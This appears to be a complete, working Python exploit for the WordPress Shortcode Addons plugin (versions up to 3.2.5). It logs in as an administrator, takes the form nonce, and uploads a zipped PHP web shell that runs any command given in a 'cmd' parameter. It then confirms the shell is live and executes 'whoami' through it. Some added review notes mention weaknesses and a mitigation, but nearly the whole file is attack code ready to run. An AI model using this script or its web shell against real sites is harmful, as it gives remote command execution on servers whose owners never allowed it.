import requests
from bs4 import BeautifulSoup
import argparse
import os
import zipfile
import time
#Exploit By: Nxploited | Khaled Alenazi,
def create_session():
    """Return a ``requests.Session`` with TLS certificate checks disabled.

    urllib3 warnings are silenced first, so nothing is printed about the
    unverified HTTPS requests that follow.

    NOTE(review): with ``verify`` off, every request made through this
    session (including the login POST that carries the password) accepts
    any certificate the remote end presents.
    """
    requests.packages.urllib3.disable_warnings()
    http = requests.Session()
    http.verify = False
    return http
def login(session, base_url, username, password, user_agent):
    """Submit the WordPress login form and report whether it succeeded.

    Args:
        session: HTTP session whose cookie jar receives the login cookies.
        base_url: Site root without a trailing slash.
        username: Value sent in the ``log`` form field.
        password: Value sent in the ``pwd`` form field.
        user_agent: Value for the ``User-Agent`` request header.

    Returns:
        True if the session holds a cookie whose name contains
        ``wordpress_logged_in`` after the POST, otherwise False.
    """
    form = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }
    session.post(
        base_url + '/wp-login.php',
        data=form,
        headers={'User-Agent': user_agent},
    )
    # The HTTP response is not inspected; only the cookie jar decides the
    # outcome.
    authenticated = any(
        'wordpress_logged_in' in cookie.name for cookie in session.cookies
    )
    if authenticated:
        print("[+] Authentication successful.")
    else:
        print("[-] Authentication failed.")
    return authenticated
def extract_nonce(session, import_url, user_agent):
    """Fetch the plugin import page and return its ``_wpnonce`` form value.

    Args:
        session: Authenticated HTTP session.
        import_url: URL of the plugin's import admin page.
        user_agent: Value for the ``User-Agent`` request header.

    Returns:
        The ``value`` attribute of the first ``<input name="_wpnonce">``
        found in the page, or None when no such input exists.
    """
    page = session.get(import_url, headers={'User-Agent': user_agent})
    field = BeautifulSoup(page.text, 'html.parser').find(
        'input', {'name': '_wpnonce'}
    )
    if not field:
        print("[-] _wpnonce not found.")
        return None
    # The nonce is echoed to stdout, so it ends up in any captured output.
    print(f"[+] _wpnonce extracted: {field['value']}")
    return field['value']
def generate_payload(zip_name, php_name):
    """Write the proof-of-concept PHP file and pack it into a zip archive.

    The PHP file hands the ``cmd`` query parameter to ``system()``, i.e. it
    is a command-execution web shell. Both output files are written to the
    paths given, relative to the current working directory.

    Args:
        zip_name: Path of the zip archive to create.
        php_name: Path of the PHP file to create and add to the archive.
    """
    with open(php_name, 'w') as php_out:
        php_out.write('<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>')
    archive = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)
    with archive:
        # Stored under the same relative name it has on disk.
        archive.write(php_name)
    print(f"[+] Payload {zip_name} created.")
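def upload_payload(session, import_url, user_agent, nonce, zip_name):
    """POST the zip archive to the plugin's import form.

    Args:
        session: Authenticated HTTP session.
        import_url: URL of the plugin's import admin page.
        user_agent: Value for the ``User-Agent`` request header.
        nonce: ``_wpnonce`` value taken from the import page.
        zip_name: Path of the archive sent as the ``validuploaddata`` field.

    Returns:
        True when the server answers with HTTP 200, otherwise False.

    NOTE(review): the status code is the only success signal. A 200 shows
    that the admin page rendered, not necessarily that the archive was
    accepted - confirm against the response body if that matters.
    """
    data = {
        '_wpnonce': nonce,
        '_wp_http_referer': '/wp-admin/admin.php?page=shortcode-addons-import',
        'data-upload': 'Save'
    }
    headers = {
        'User-Agent': user_agent,
        'Referer': import_url
    }
    # The archive was previously opened without ever being closed; the
    # with-block releases the handle as soon as the request has been sent.
    with open(zip_name, 'rb') as archive:
        files = {
            'validuploaddata': (zip_name, archive, 'application/zip')
        }
        response = session.post(import_url, headers=headers, files=files, data=data)
    if response.status_code == 200:
        print("[+] Payload uploaded.")
        return True
    print("[-] Upload failed.")
    return False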
def confirm_shell(base_url):
    """Check whether the uploaded PHP file is reachable under the uploads tree.

    The request is made with a plain ``requests.get`` rather than the
    logged-in session, so a 200 here means the file is served without any
    WordPress cookies. The file name ``nxploit.php`` is hard-coded in the
    path.

    Args:
        base_url: Site root without a trailing slash.

    Returns:
        The file's URL when the server answers with HTTP 200, else None.
    """
    candidate = base_url + '/wp-content/uploads/shortcode-addons/nxploit.php'
    # Fixed three-second pause before probing.
    time.sleep(3)
    probe = requests.get(candidate, verify=False)
    if probe.status_code != 200:
        print("[-] Shell not found.")
        return None
    print(f"[+] Shell is accessible at: {candidate}")
    return candidate
def execute_command(shell_url):
    """Request ``?cmd=whoami`` from the uploaded file and print the reply.

    Args:
        shell_url: URL of the uploaded PHP file.

    The response body is printed between two separator lines when the
    server answers with HTTP 200; otherwise a failure message is printed.
    Nothing is returned.
    """
    reply = requests.get(shell_url + '?cmd=whoami', verify=False)
    if reply.status_code != 200:
        print("[-] Failed to execute command.")
        return
    separator = "------------------"
    print("[+] Command output:")
    print(separator)
    print(reply.text.strip())
    print(separator)
def cleanup(files):
    """Delete each listed path that exists on the local disk.

    Args:
        files: Iterable of local file paths; missing paths are skipped.

    Only local files are removed. Nothing here touches the copy that was
    uploaded to the remote site.
    """
    # filter() is lazy, so each path is checked right before it is removed.
    for leftover in filter(os.path.exists, files):
        os.remove(leftover)
    print("[+] Temporary files removed.")
def exploit():
    """Parse the command line and run the upload proof of concept end to end.

    Steps: log in, read the import-page nonce, build the archive, upload
    it, probe for the uploaded file, request ``whoami`` through it, then
    delete the local temporary files.

    The parser description names the affected range as Shortcode Addons
    <= 3.2.5 and states that administrator credentials are required.

    NOTE(review): the password is taken from ``-p`` on the command line,
    which typically leaves it in shell history and the process list.
    NOTE(review): releases above 3.2.5 are presumably fixed - confirm
    against the vendor advisory. Denying PHP execution under
    ``wp-content/uploads`` would also stop the uploaded file from running.
    """
    cli = argparse.ArgumentParser(description="Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload # By:Nxploited | Khaled Alenazi,")
    for flags, help_text in (
        (('-u', '--url'), 'Target URL'),
        (('-un', '--username'), 'Username'),
        (('-p', '--password'), 'Password'),
    ):
        cli.add_argument(*flags, required=True, help=help_text)
    opts = cli.parse_args()

    site = opts.url.rstrip('/')
    import_page = site + '/wp-admin/admin.php?page=shortcode-addons-import'
    agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

    http = create_session()
    if not login(http, site, opts.username, opts.password, agent):
        return
    token = extract_nonce(http, import_page, agent)
    if not token:
        return

    php_file = 'nxploit.php'
    zip_file = 'nxploit.zip'
    generate_payload(zip_file, php_file)
    if upload_payload(http, import_page, agent, token, zip_file):
        live_url = confirm_shell(site)
        if live_url:
            execute_command(live_url)
    # Local artifacts are removed whether or not the upload went through.
    cleanup([php_file, zip_file])
# Run the proof of concept only when executed as a script, not on import.
if "__main__" == __name__:
    exploit()